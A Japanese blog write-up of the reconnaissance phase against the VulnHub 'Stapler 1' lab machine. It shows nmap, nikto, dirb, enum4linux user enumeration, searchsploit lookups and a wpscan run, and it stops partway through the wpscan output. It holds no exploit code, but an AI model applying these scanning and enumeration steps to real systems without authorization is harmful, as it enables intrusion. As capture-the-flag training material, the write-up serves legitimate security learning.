vulnhub Stapler 1 雑記
Stapler 1
サービス調査
# nmap -p- 10.10.10.14 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 22:42 EDT Nmap scan report for 10.10.10.14 Host is up (0.00075s latency). Not shown: 65523 filtered ports PORT STATE SERVICE 20/tcp closed ftp-data 21/tcp open ftp 22/tcp open ssh 53/tcp open domain 80/tcp open http 123/tcp closed ntp 137/tcp closed netbios-ns 138/tcp closed netbios-dgm 139/tcp open netbios-ssn 666/tcp open doom 3306/tcp open mysql 12380/tcp open unknown MAC Address: 08:00:27:ED:2F:88 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 117.87 seconds # nmap -Pn -p20,21,22,53,80,123,137,138,139,666,3306,12380 -sV --version-all 10.10.10.14 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 22:46 EDT Nmap scan report for 10.10.10.14 Host is up (0.00049s latency). PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 53/tcp open domain dnsmasq 2.75 80/tcp open http PHP cli server 5.5 or later 123/tcp closed ntp 137/tcp closed netbios-ns 138/tcp closed netbios-dgm 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 666/tcp open doom? 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 12380/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port666-TCP:V=7.80%I=9%D=5/11%Time=5EBA0DFF%P=x86_64-pc-linux-gnu%r(NUL SF:L,1350,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1 SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0 SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\ SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2: SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\ SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\ SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\ SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\ SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\ SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\ SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\ SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\ SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9 SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4 SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\ SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0 SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\ SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\ SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0"); MAC Address: 08:00:27:ED:2F:88 (Oracle VirtualBox virtual NIC) Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds
何かzipぽいバイナリが見えるけどどうやって変換するか分からん。
気になりどころ
- [port 21] ftp vsftpd 2.0.8 or later
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
- [port 53] domain dnsmasq 2.75
- [port 80] http PHP cli server 5.5 or later
- [port 139] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- [port 666] open doom?
- [port 3306] mysql MySQL 5.7.12-0ubuntu1
- [port 12380] http Apache httpd 2.4.18 (Ubuntu)
はじめてのwellknown port外サービス検出。
doom?
詳細
[port 21] ftp vsftpd 2.0.8 or later
今回は珍しくftpのバージョンが曖昧。
# ftp 10.10.10.14 Connected to 10.10.10.14. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (10.10.10.14:root): 331 Please specify the password. Password: 530 Login incorrect. Login failed. ftp> ls 530 Please login with USER and PASS. ftp: bind: Address already in use ftp> exit 221 Goodbye.
ftpのログインはダメだったが、何かのヒントらしきものが見える。
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
user enumしても分からん。
[port 53] domain dnsmasq 2.75
dnsサーバはアプローチが全く分からん。
# searchsploit dnsmasq ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference | exploits/windows/dos/9617.txt Dnsmasq < 2.78 - 2-byte Heap Overflow | exploits/multiple/dos/42941.py Dnsmasq < 2.78 - Heap Overflow | exploits/multiple/dos/42942.py Dnsmasq < 2.78 - Information Leak | exploits/multiple/dos/42944.py Dnsmasq < 2.78 - Integer Underflow | exploits/multiple/dos/42946.py Dnsmasq < 2.78 - Lack of free() Denial of Service | exploits/multiple/dos/42945.py Dnsmasq < 2.78 - Stack Overflow | exploits/multiple/dos/42943.py Web Interface for DNSmasq / Mikrotik - SQL Injection | exploits/php/webapps/39817.php dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) | exploits/linux/dos/48301.py ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
たぶん無し?
[port 80] http PHP cli server 5.5 or later
phpのhttpは珍しい気がする。
# nikto -h 10.10.10.14 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.14 + Target Hostname: 10.10.10.14 + Target Port: 80 + Start Time: 2020-05-11 23:29:07 (GMT-4) --------------------------------------------------------------------------- + Server: No banner retrieved + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information. + OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration. + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response + Scan terminated: 20 error(s) and 5 item(s) reported on remote host + End Time: 2020-05-11 23:29:31 (GMT-4) (24 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
「.bashrc」とかあるし、ユーザのホームディレクトリで動いてる?
# dirb http://10.10.10.14 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon May 11 23:33:56 2020 URL_BASE: http://10.10.10.14/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.14/ ---- + http://10.10.10.14/.bashrc (CODE:200|SIZE:3771) + http://10.10.10.14/.profile (CODE:200|SIZE:675) ----------------- END_TIME: Mon May 11 23:34:07 2020 DOWNLOADED: 4612 - FOUND: 2
とりあえず、「.bashrc」が気になる。
$ cat bashrc # ~/.bashrc: executed by bash(1) for non-login shells. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples # If not running interactively, don't do anything case $- in *i*) ;; *) return;; esac # don't put duplicate lines or lines starting with space in the history. # See bash(1) for more options HISTCONTROL=ignoreboth # append to the history file, don't overwrite it shopt -s histappend # for setting history length see HISTSIZE and HISTFILESIZE in bash(1) HISTSIZE=1000 HISTFILESIZE=2000 # check the window size after each command and, if necessary, # update the values of LINES and COLUMNS. shopt -s checkwinsize # If set, the pattern "**" used in a pathname expansion context will # match all files and zero or more directories and subdirectories. #shopt -s globstar # make less more friendly for non-text input files, see lesspipe(1) [ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)" # set variable identifying the chroot you work in (used in the prompt below) if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then debian_chroot=$(cat /etc/debian_chroot) fi # set a fancy prompt (non-color, unless we know we "want" color) case "$TERM" in xterm-color|*-256color) color_prompt=yes;; esac # uncomment for a colored prompt, if the terminal has the capability; turned # off by default to not distract the user: the focus in a terminal window # should be on the output of commands, not on the prompt #force_color_prompt=yes if [ -n "$force_color_prompt" ]; then if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then # We have color support; assume it's compliant with Ecma-48 # (ISO/IEC-6429). (Lack of such support is extremely rare, and such # a case would tend to support setf rather than setaf.) color_prompt=yes else color_prompt= fi fi if [ "$color_prompt" = yes ]; then PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ ' else PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ' fi unset color_prompt force_color_prompt # If this is an xterm set the title to user@host:dir case "$TERM" in xterm*|rxvt*) PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1" ;; *) ;; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ]; then test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)" alias ls='ls --color=auto' #alias dir='dir --color=auto' #alias vdir='vdir --color=auto' alias grep='grep --color=auto' alias fgrep='fgrep --color=auto' alias egrep='egrep --color=auto' fi # colored GCC warnings and errors #export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01' # some more ls aliases alias ll='ls -alF' alias la='ls -A' alias l='ls -CF' # Add an "alert" alias for long running commands. Use like so: # sleep 10; alert alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"' # Alias definitions. # You may want to put all your additions into a separate file like # ~/.bash_aliases, instead of adding them here directly. # See /usr/share/doc/bash-doc/examples in the bash-doc package. if [ -f ~/.bash_aliases ]; then . ~/.bash_aliases fi # enable programmable completion features (you don't need to enable # this, if it's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc). if ! shopt -oq posix; then if [ -f /usr/share/bash-completion/bash_completion ]; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ]; then . /etc/bash_completion fi fi
chrootの脆弱性を見たことがあるので何かあるかもしれない。
ついでに、「.profile」
$ cat profile # ~/.profile: executed by the command interpreter for login shells. # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login # exists. # see /usr/share/doc/bash/examples/startup-files for examples. # the files are located in the bash-doc package. # the default umask is set in /etc/profile; for setting the umask # for ssh logins, install and configure the libpam-umask package. #umask 022 # if running bash if [ -n "$BASH_VERSION" ]; then # include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/bin" ] ; then PATH="$HOME/bin:$PATH" fi
どっちみち、shellが取れないと有用ではなさそう。 php cli serverの脆弱性も上手く見つけられないので詰みかな。
[port 139] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
# enum4linux 10.10.10.14 (snip) ====================================================================== | Users on 10.10.10.14 via RID cycling (RIDS: 500-550,1000-1050) | ====================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-864226560-67800430-3082388513 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-32 and logon username '', password '' (snip) S-1-22-1-1000 Unix User\peter (Local User) S-1-22-1-1001 Unix User\RNunemaker (Local User) S-1-22-1-1002 Unix User\ETollefson (Local User) S-1-22-1-1003 Unix User\DSwanger (Local User) S-1-22-1-1004 Unix User\AParnell (Local User) S-1-22-1-1005 Unix User\SHayslett (Local User) S-1-22-1-1006 Unix User\MBassin (Local User) S-1-22-1-1007 Unix User\JBare (Local User) S-1-22-1-1008 Unix User\LSolum (Local User) S-1-22-1-1009 Unix User\IChadwick (Local User) S-1-22-1-1010 Unix User\MFrei (Local User) S-1-22-1-1011 Unix User\SStroud (Local User) S-1-22-1-1012 Unix User\CCeaser (Local User) S-1-22-1-1013 Unix User\JKanode (Local User) S-1-22-1-1014 Unix User\CJoo (Local User) S-1-22-1-1015 Unix User\Eeth (Local User) S-1-22-1-1016 Unix User\LSolum2 (Local User) S-1-22-1-1017 Unix User\JLipps (Local User) S-1-22-1-1018 Unix User\jamie (Local User) S-1-22-1-1019 Unix User\Sam (Local User) S-1-22-1-1020 Unix User\Drew (Local User) S-1-22-1-1021 Unix User\jess (Local User) S-1-22-1-1022 Unix User\SHAY (Local User) S-1-22-1-1023 Unix User\Taylor (Local User) S-1-22-1-1024 Unix User\mel (Local User) S-1-22-1-1025 Unix User\kai (Local User) S-1-22-1-1026 Unix User\zoe (Local User) S-1-22-1-1027 Unix User\NATHAN (Local User) S-1-22-1-1028 Unix User\www (Local User) S-1-22-1-1029 Unix User\elly (Local User) (snip)
残念ながらSambaのバージョンは分からなかったけど、 userは色々見つけた。 以上。 本当はmetasploit使えば新たな展開があるだろうけど、あまり頼りたくない。
[port 666] open doom?
doom?
調べたらまさかのゲームの「DOOM」のプロトコル?
マジか?
とりあえずexploit探したけれど見つからず。
そういえば、nmapで確認したときに出てきた謎バイナリport 666から来てたような
firefoxでport 666を開くと文字化けが表示され、curlしてみたら「HTTP 0.9なので無理」と言われた。
仕方が無いので、firefoxでダウンロードする。とりあえず、「data.zip」というファイル名でダウンロードしてみたところ
# file data.zip data.zip: Zip archive data, at least v2.0 to extract
やはりzip
# unzip data.zip Archive: data.zip inflating: message2.jpg # file message2.jpg message2.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 364x77, components 3
画像を表示してみると
~$ echo Hello World. Hello World. ~$ ~$ echo Scott, please change this message segmentation fault
という謎メッセージが。うーむ。
# exiftool message2.jpg ExifTool Version Number : 11.94 File Name : message2.jpg Directory : . File Size : 13 kB File Modification Date/Time : 2016:06:03 11:03:07-04:00 File Access Date/Time : 2020:05:12 00:22:45-04:00 File Inode Change Date/Time : 2020:05:12 00:22:21-04:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Resolution Unit : None X Resolution : 72 Y Resolution : 72 Current IPTC Digest : 020ab2da2a37c332c141ebf819e37e6d Contact : If you are reading this, you should get a cookie! Application Record Version : 4 IPTC Digest : d41d8cd98f00b204e9800998ecf8427e Image Width : 364 Image Height : 77 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1) Image Size : 364x77 Megapixels : 0.028
cookie? すごいヒントなのかもしれないが何のcookieなのか分からん。
[port 3306] mysql MySQL 5.7.12-0ubuntu1
ここまで、mysqlの手がかりは特に無かったのでログインできず。
[port 12380] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.14 -p 12380 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.14 + Target Hostname: 10.10.10.14 + Target Port: 12380 --------------------------------------------------------------------------- + SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost Ciphers: ECDHE-RSA-AES256-GCM-SHA384 Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost + Start Time: 2020-05-12 00:47:44 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'dave' found, with contents: Soemthing doesn't look right here + The site uses SSL and the Strict-Transport-Security HTTP header is not defined. + The site uses SSL and Expect-CT header is not present. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 2 entries which should be manually viewed. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Hostname '10.10.10.14' does not match certificate's names: Red.Initech + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD + Uncommon header 'x-ob_mode' found, with contents: 1 + OSVDB-3233: /icons/README: Apache default file found. + /phpmyadmin/: phpMyAdmin directory found + 8019 requests: 0 error(s) and 15 item(s) reported on remote host + End Time: 2020-05-12 00:52:42 (GMT-4) (298 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
今まで悩んでいたのは何だったんだというぐらいの大判振る舞い
# dirb http://10.10.10.14:12380 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue May 12 00:54:06 2020 URL_BASE: http://10.10.10.14:12380/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.14:12380/ ---- ----------------- END_TIME: Tue May 12 00:55:14 2020 DOWNLOADED: 4612 - FOUND: 0
そろそろdirbからの乗り換え時期だろうか。
では、「robots.txt」から確認していく。
firefoxでport 12380にアクセスしてみる。
wordpressぽいデザインを使ったページが返ってきた。
しかし、「robots.txt」は表示されずホームページが返ってきた。
何故?
仕方が無いので「/admin112233/」,「/blogblog/」,「/phpmyadmin/」を見ていくことにする。
また、ホームページが返ってきた。
何を要求してもホームページしか返さない使命を持っているようだ。
何でだぁ。
--------------------------------------------------------------------------- + SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost Ciphers: ECDHE-RSA-AES256-GCM-SHA384 Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost + Start Time: 2020-05-12 00:47:44 (GMT-4) ---------------------------------------------------------------------------
そういえばnikto
の結果にこんなのあったな。
おかしいなぁhttpsじゃない...のに...?
それじゃん。
# curl -k https://10.10.10.14:12380/robots.txt User-agent: * Disallow: /admin112233/ Disallow: /blogblog/
firefoxでもhttpsならホームページ以外を見れるようになった。
curlだと証明書が無く、無理に接続するときは-k
オプション。
改めて、「/admin112233/」,「/blogblog/」,「/phpmyadmin/」を見ていく。
「/admin112233/」を見ると
This could of been a BeEF-XSS hook;)
とalert()ぽいのが表示された。
何を言っているのかよく分からないが、誰か「beef-xss」でも使っていたのかね。
「/admin112233/」を見ると、wordpressぽいブログが表示される。
とりあえず脳死でLog in admin/adminをしたが通らず。
やっと真面目にwpscanの活躍するときが来たか。
# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog -e at,ap,u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]n [+] URL: https://10.10.10.14:12380/blogblog/ [10.10.10.14] [+] Started: Tue May 12 03:34:51 2020 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.18 (Ubuntu) | - Dave: Soemthing doesn't look right here | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: https://10.10.10.14:12380/blogblog/xmlrpc.php | Found By: Headers (Passive Detection) | Confidence: 100% | Confirmed By: | - Link Tag (Passive Detection), 30% confidence | - Direct Access (Aggressive Detection), 100% confidence | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] https://10.10.10.14:12380/blogblog/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Registration is enabled: https://10.10.10.14:12380/blogblog/wp-login.php?action=register | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: https://10.10.10.14:12380/blogblog/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: https://10.10.10.14:12380/blogblog/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27). | Found By: Rss Generator (Passive Detection) | - https://10.10.10.14:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator> | - https://10.10.10.14:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator> [+] WordPress theme in use: bhost | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/ | Last Updated: 2019-12-08T00:00:00.000Z | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/readme.txt | [!] The version is out of date, the latest version is 1.4.4 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1 | Style Name: BHost | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ... | Author: Masum Billah | Author URI: http://getmasum.net/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2.9 (80% confidence) | Found By: Style (Passive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating All Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:31 <===================================> (20900 / 20900) 100.00% Time: 00:00:31 [+] Checking Theme Versions (via Passive and Aggressive Methods) [i] Theme(s) Identified: [+] bhost | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/ | Last Updated: 2019-12-08T00:00:00.000Z | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/readme.txt | [!] The version is out of date, the latest version is 1.4.4 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css | Style Name: BHost | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ... | Author: Masum Billah | Author URI: http://getmasum.net/ | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/, status: 500 | | Version: 1.2.9 (80% confidence) | Found By: Style (Passive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css, Match: 'Version: 1.2.9' [+] creative-blog | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/ | Last Updated: 2020-03-01T00:00:00.000Z | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/readme.txt | [!] The version is out of date, the latest version is 1.1.3 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/style.css | Style Name: Creative Blog | Style URI: http://napitwptech.com/themes/creative-blog/ | Description: Creative Blog is an extremely creative WordPress theme to create your own personal blog site very ea... | Author: Bishal Napit | Author URI: http://napitwptech.com/themes/ | | Found By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/, status: 500 | | Version: 0.9 (80% confidence) | Found By: Style (Passive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/style.css, Match: 'Version: 0.9' [+] sydney | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/ | Last Updated: 2020-03-13T00:00:00.000Z | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/readme.txt | [!] The version is out of date, the latest version is 1.60 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/style.css | Style Name: Sydney | Style URI: http://athemes.com/theme/sydney | Description: Sydney is a powerful business theme that provides a fast way for companies or freelancers to create ... | Author: aThemes | Author URI: http://athemes.com | | Found By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/, status: 500 | | Version: 1.28 (80% confidence) | Found By: Style (Passive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/style.css, Match: 'Version: 1.28' [+] trope | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/ | Last Updated: 2018-06-12T00:00:00.000Z | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/readme.txt | [!] The version is out of date, the latest version is 1.2 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/style.css | Style Name: Trope | Style URI: http://wpdean.com/trope-wordpress-theme/ | Description: Trope is a free WordPress theme that comes with clean, modern, minimal and fully responsive design w... | Author: WPDean | Author URI: http://wpdean.com/ | | Found By: Known Locations (Aggressive Detection) | - https://10.10.10.14:12380/blogblog/wp-content/themes/trope/, status: 500 | | Version: 1.1.0 (80% confidence) | Found By: Style (Passive Detection) | - 